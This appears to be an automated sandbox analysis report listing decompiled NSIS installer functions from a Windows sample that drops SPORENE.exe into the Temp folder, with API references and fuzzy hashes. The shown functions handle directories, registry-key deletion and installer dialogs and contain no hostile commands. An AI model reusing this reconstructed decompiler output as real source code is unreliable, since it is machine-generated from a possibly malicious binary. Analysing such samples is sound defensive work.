                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Global$AllocFree$CloseDeleteFileHandle
                • String ID:
                • API String ID: 2667972263-0
                • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405A6E(WCHAR* _a4) {
                				struct _SECURITY_ATTRIBUTES _v16;
                				struct _SECURITY_DESCRIPTOR _v36;
                				long _t23;
                
                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                				_v36.Owner = 0x4083f8;
                				_v36.Group = 0x4083f8;
                				_v36.Sacl = _v36.Sacl & 0x00000000;
                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                				_v16.lpSecurityDescriptor =  &_v36;
                				_v36.Revision = 1;
                				_v36.Control = 4;
                				_v36.Dacl = 0x4083e8;
                				_v16.nLength = 0xc;
                				if(CreateDirectoryW(_a4,  &_v16) != 0) {
                					L1:
                					return 0;
                				}
                				_t23 = GetLastError();
                				if(_t23 == 0xb7) {
                					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                						goto L1;
                					}
                					return GetLastError();
                				}
                				return _t23;
                			}






                0x00405a79
                0x00405a7d
                0x00405a80
                0x00405a86
                0x00405a8a
                0x00405a8e
                0x00405a96
                0x00405a9d
                0x00405aa3
                0x00405aaa
                0x00405ab9
                0x00405abb
                0x00000000
                0x00405abb
                0x00405ac5
                0x00405acc
                0x00405ae2
                0x00000000
                0x00000000
                0x00000000
                0x00405ae4
                0x00405ae8

                APIs
                • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                • GetLastError.KERNEL32 ref: 00405AC5
                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                • GetLastError.KERNEL32 ref: 00405AE4
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorLast$CreateDirectoryFileSecurity
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 3449924974-3936084776
                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 48%
                			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                				void* _v8;
                				int _v12;
                				short _v536;
                				void* _t27;
                				signed int _t33;
                				intOrPtr* _t35;
                				signed int _t45;
                				signed int _t46;
                				signed int _t47;
                
                				_t46 = _a12;
                				_t47 = _t46 & 0x00000300;
                				_t45 = _t46 & 0x00000001;
                				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                				if(_t27 == 0) {
                					if((_a12 & 0x00000002) == 0) {
                						L3:
                						_push(0x105);
                						_push( &_v536);
                						_push(0);
                						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                							__eflags = _t45;
                							if(__eflags != 0) {
                								L10:
                								RegCloseKey(_v8);
                								return 0x3eb;
                							}
                							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                							__eflags = _t33;
                							if(_t33 != 0) {
                								break;
                							}
                							_push(0x105);
                							_push( &_v536);
                							_push(_t45);
                						}
                						RegCloseKey(_v8);
                						_t35 = E0040690A(3);
                						if(_t35 != 0) {
                							return  *_t35(_a4, _a8, _t47, 0);
                						}
                						return RegDeleteKeyW(_a4, _a8);
                					}
                					_v12 = 0;
                					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                						goto L10;
                					}
                					goto L3;
                				}
                				return _t27;
                			}












                0x00402eb4
                0x00402ebd
                0x00402ec6
                0x00402ed2
                0x00402edb
                0x00402ee5
                0x00402f0a
                0x00402f10
                0x00402f15
                0x00402f16
                0x00402f46
                0x00402f1f
                0x00402f21
                0x00402f71
                0x00402f74
                0x00000000
                0x00402f7a
                0x00402f30
                0x00402f35
                0x00402f37
                0x00000000
                0x00000000
                0x00402f3f
                0x00402f44
                0x00402f45
                0x00402f45
                0x00402f52
                0x00402f5a
                0x00402f61
                0x00000000
                0x00402f8a
                0x00000000
                0x00402f69
                0x00402ef5
                0x00402f08
                0x00000000
                0x00000000
                0x00000000
                0x00402f08
                0x00402f90

                APIs
                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseEnum$DeleteValue
                • String ID:
                • API String ID: 1354259210-0
                • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00401D81(void* __ebx, void* __edx) {
                				struct HWND__* _t30;
                				WCHAR* _t38;
                				void* _t48;
                				void* _t53;
                				signed int _t55;
                				signed int _t60;
                				long _t63;
                				void* _t65;
                
                				_t53 = __ebx;
                				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                				} else {
                					E00402D84(2);
                					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                				}
                				_t55 =  *(_t65 - 0x24);
                				 *(_t65 + 8) = _t30;
                				_t60 = _t55 & 0x00000004;
                				 *(_t65 - 0x38) = _t55 & 0x00000003;
                				 *(_t65 - 0x18) = _t55 >> 0x1f;
                				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                				if((_t55 & 0x00010000) == 0) {
                					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                				} else {
                					_t38 = E00402DA6(0x11);
                				}
                				 *(_t65 - 0x44) = _t38;
                				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                				asm("sbb esi, esi");
                				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                					DeleteObject(_t48);
                				}
                				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                					_push(_t63);
                					E00406484();
                				}
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                				return 0;
                			}











                0x00401d81
                0x00401d85
                0x00401d9a
                0x00401d87
                0x00401d89
                0x00401d8f
                0x00401d8f
                0x00401da0
                0x00401da3
                0x00401dad
                0x00401db0
                0x00401db8
                0x00401dc9
                0x00401dcc
                0x00401dd7
                0x00401dce
                0x00401dd0
                0x00401dd0
                0x00401ddb
                0x00401de5
                0x00401e0c
                0x00401e1b
                0x00401e29
                0x00401e31
                0x00401e39
                0x00401e39
                0x00401e42
                0x00401e48
                0x00402ba4
                0x00402ba4
                0x00402c2d
                0x00402c39

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                • String ID:
                • API String ID: 1849352358-0
                • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E00401E4E(intOrPtr __edx) {
                				void* __edi;
                				int _t9;
                				signed char _t15;
                				struct HFONT__* _t18;
                				intOrPtr _t30;
                				void* _t31;
                				struct HDC__* _t33;
                				void* _t35;
                
                				_t30 = __edx;
                				_t33 = GetDC( *(_t35 - 8));
                				_t9 = E00402D84(2);
                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                				ReleaseDC( *(_t35 - 8), _t33);
                				 *0x40ce00 = E00402D84(3);
                				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                				 *0x40ce07 = 1;
                				 *0x40ce04 = _t15 & 0x00000001;
                				 *0x40ce05 = _t15 & 0x00000002;
                				 *0x40ce06 = _t15 & 0x00000004;
                				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                				_t18 = CreateFontIndirectW(0x40cdf0);
                				_push(_t18);
                				_push(_t31);
                				E00406484();
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                				return 0;
                			}











                0x00401e4e
                0x00401e59
                0x00401e5b
                0x00401e68
                0x00401e7f
                0x00401e84
                0x00401e91
                0x00401e96
                0x00401e9a
                0x00401ea5
                0x00401eac
                0x00401ebe
                0x00401ec4
                0x00401ec9
                0x00401ed3
                0x00402638
                0x0040156d
                0x00402ba4
                0x00402c2d
                0x00402c39

                APIs
                • GetDC.USER32(?), ref: 00401E51
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                • ReleaseDC.USER32 ref: 00401E84
                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                • String ID:
                • API String ID: 2584051700-0
                • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                				char _v68;
                				char _v132;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t23;
                				signed int _t24;
                				void* _t31;
                				void* _t33;
                				void* _t34;
                				void* _t44;
                				signed int _t46;
                				signed int _t50;
                				signed int _t52;
                				signed int _t53;
                				signed int _t55;
                
                				_t23 = _a16;
                				_t53 = _a12;
                				_t44 = 0xffffffdc;
                				if(_t23 == 0) {
                					_push(0x14);
                					_pop(0);
                					_t24 = _t53;
                					if(_t53 < 0x100000) {
                						_push(0xa);
                						_pop(0);
                						_t44 = 0xffffffdd;
                					}
                					if(_t53 < 0x400) {
                						_t44 = 0xffffffde;
                					}
                					if(_t53 < 0xffff3333) {
                						_t52 = 0x14;
                						asm("cdq");
                						_t24 = 1 / _t52 + _t53;
                					}
                					_t25 = _t24 & 0x00ffffff;
                					_t55 = _t24 >> 0;
                					_t46 = 0xa;
                					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                				} else {
                					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                					_t50 = 0;
                				}
                				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                			}



















                0x00404d4f
                0x00404d54
                0x00404d5c
                0x00404d5d
                0x00404d6a
                0x00404d72
                0x00404d73
                0x00404d75
                0x00404d77
                0x00404d79
                0x00404d7c
                0x00404d7c
                0x00404d83
                0x00404d89
                0x00404d89
                0x00404d90
                0x00404d97
                0x00404d9a
                0x00404d9d
                0x00404d9d
                0x00404da1
                0x00404db1
                0x00404db3
                0x00404db6
                0x00404d5f
                0x00404d5f
                0x00404d66
                0x00404d66
                0x00404dbe
                0x00404dc9
                0x00404ddf
                0x00404df0
                0x00404e0c

                APIs
                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                • wsprintfW.USER32 ref: 00404DF0
                • SetDlgItemTextW.USER32 ref: 00404E03
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ItemTextlstrlenwsprintf
                • String ID: %u.%u%s%s
                • API String ID: 3540041739-3551169577
                • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00405E0C(WCHAR* _a4) {
                				WCHAR* _t9;
                
                				_t9 = _a4;
                				_push( &(_t9[lstrlenW(_t9)]));
                				_push(_t9);
                				if( *(CharPrevW()) != 0x5c) {
                					lstrcatW(_t9, 0x40a014);
                				}
                				return _t9;
                			}




                0x00405e0d
                0x00405e1a
                0x00405e1b
                0x00405e26
                0x00405e2e
                0x00405e2e
                0x00405e36

                APIs
                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 2659869361-3936084776
                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403019(intOrPtr _a4) {
                				long _t2;
                				struct HWND__* _t3;
                				struct HWND__* _t6;
                
                				if(_a4 == 0) {
                					if( *0x42aa20 == 0) {
                						_t2 = GetTickCount();
                						if(_t2 >  *0x434f0c) {
                							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                							 *0x42aa20 = _t3;
                							return ShowWindow(_t3, 5);
                						}
                						return _t2;
                					} else {
                						return E00406946(0);
                					}
                				} else {
                					_t6 =  *0x42aa20;
                					if(_t6 != 0) {
                						_t6 = DestroyWindow(_t6);
                					}
                					 *0x42aa20 = 0;
                					return _t6;
                				}
                			}






                0x00403020
                0x00403040
                0x0040304a
                0x00403056
                0x00403067
                0x00403070
                0x00000000
                0x00403075
                0x0040307c
                0x00403042
                0x00403049
                0x00403049
                0x00403022
                0x00403022
                0x00403029
                0x0040302c
                0x0040302c
                0x00403032
                0x00403039
                0x00403039

                APIs
                • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                • GetTickCount.KERNEL32 ref: 0040304A
                • CreateDialogParamW.USER32 ref: 00403067
                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$CountCreateDestroyDialogParamShowTick
                • String ID:
                • API String ID: 2102729457-0
                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E00405F14(void* __eflags, intOrPtr _a4) {
                				int _t11;
                				signed char* _t12;
                				intOrPtr _t18;
                				intOrPtr* _t21;
                				signed int _t23;
                
                				E0040653D(0x42fa70, _a4);
                				_t21 = E00405EB7(0x42fa70);
                				if(_t21 != 0) {
                					E004067C4(_t21);
                					if(( *0x434f18 & 0x00000080) == 0) {
                						L5:
                						_t23 = _t21 - 0x42fa70 >> 1;
                						while(1) {
                							_t11 = lstrlenW(0x42fa70);
                							_push(0x42fa70);
                							if(_t11 <= _t23) {
                								break;
                							}
                							_t12 = E00406873();
                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                								E00405E58(0x42fa70);
                								continue;
                							} else {
                								goto L1;
                							}
                						}
                						E00405E0C();
                						return 0 | GetFileAttributesW(??) != 0xffffffff;
                					}
                					_t18 =  *_t21;
                					if(_t18 == 0 || _t18 == 0x5c) {
                						goto L1;
                					} else {
                						goto L5;
                					}
                				}
                				L1:
                				return 0;
                			}








                0x00405f20
                0x00405f2b
                0x00405f2f
                0x00405f36
                0x00405f42
                0x00405f52
                0x00405f54
                0x00405f6c
                0x00405f6d
                0x00405f74
                0x00405f75
                0x00000000
                0x00000000
                0x00405f58
                0x00405f5f
                0x00405f67
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405f5f
                0x00405f77
                0x00000000
                0x00405f8b
                0x00405f44
                0x00405f4a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405f4a
                0x00405f31
                0x00000000

                APIs
                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,747DFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,747DFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,747DFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,747DFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 3248276644-3936084776
                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
